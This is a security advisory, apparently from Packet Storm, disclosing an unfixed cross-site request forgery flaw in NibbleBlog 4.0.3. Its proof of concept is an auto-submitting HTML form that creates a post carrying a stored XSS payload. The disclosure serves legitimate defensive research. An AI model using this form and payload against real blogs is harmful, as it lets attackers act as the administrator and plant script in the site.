NibbleBlog 4.0.3 Cross Site Request Forgery

2015-09-01T00:00:00
ID PACKETSTORM:133424
Type packetstorm
Reporter Tim Coen
Modified 2015-09-01T00:00:00

Description

                                        
                                            `NibbleBlog 4.0.3: CSRF  
Security Advisory – Curesec Research Team  
  
1. Introduction  
  
Affected Product: NibbleBlog 4.0.3   
Fixed in: not fixed  
Fixed Version Link: n/a   
Vendor Contact: Website: http://www.nibbleblog.com/   
Vulnerability Type: CSRF   
Remote Exploitable: Yes   
Reported to vendor: 07/21/2015   
Disclosed to public: 09/01/2015   
Release mode: Full Disclosure   
CVE: n/a   
Credits Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
NibbleBlog 4.0.3 does not have CSRF protection. This means that an  
attacker can perform actions for an admin if the admin is logged in and  
visits an attacker controlled website. In the case of NibbleBlog, this  
can for example lead to persistent XSS via the creation of a new post,  
which in turn allows for phishing attacks or the injection of JavaScript  
keyloggers.  
  
3. Proof of Concept  
  
Create new Post (for Spam and XSS):  
  
<form id="myForm"  
action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple"  
method="POST">  
<input name="title" value="Interesting!">  
<input name="content" value="visit <a  
href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>">  
<input name="allow_comments" value="1">  
<input name="id_cat" value="0">  
</form>  
<script>  
document.getElementById("myForm").submit();  
</script>  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
07/21/2015 Informed Vendor about Issue  
07/22/2015 Vendor Replied  
08/18/2015 Reminded Vendor of release date (no reply)  
09/01/2015 Disclosed to public  
  
6. Blog Reference  
http://blog.curesec.com/article/blog/NibbleBlog-403-CSRF-46.html  
  
  
`